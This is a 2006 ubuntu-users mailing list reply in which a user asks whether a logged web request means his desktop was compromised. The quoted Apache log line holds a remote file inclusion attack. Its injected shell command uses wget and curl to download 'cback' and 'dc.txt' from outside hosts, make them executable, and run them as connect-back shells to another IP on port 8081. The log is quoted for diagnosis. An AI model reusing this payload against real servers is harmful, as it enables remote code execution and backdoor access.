My home desktop was compromised, but how?
Guido Heumann
listguido at web.de
Tue Feb 28 22:19:09 UTC 2006
Am Dienstag, 28. Februar 2006 22:31 schrieb Michael J. Lynch:
> Carthik Sharma wrote:
> > (The full line is :
>
> > 192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
> > /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=c
> >om_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.9
> >8.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20
> >cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%2
> >0744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-
> >o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.
> >160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%
> >20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
> > HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> > 5.1;)" )
I'm not an expert, but I don't think there's a problem here. If you take out
the weird URL, you get
"GET /index2.php?option= ... HTTP/1.1" 404 303 "-" "Mozilla/4.0 ..."
As I read it, the 404 status code says file not found, so I think this is just
a normal error log message from apache that there's no file index2.php ony
our server.
HTH,
Guido
More information about the ubuntu-users
mailing list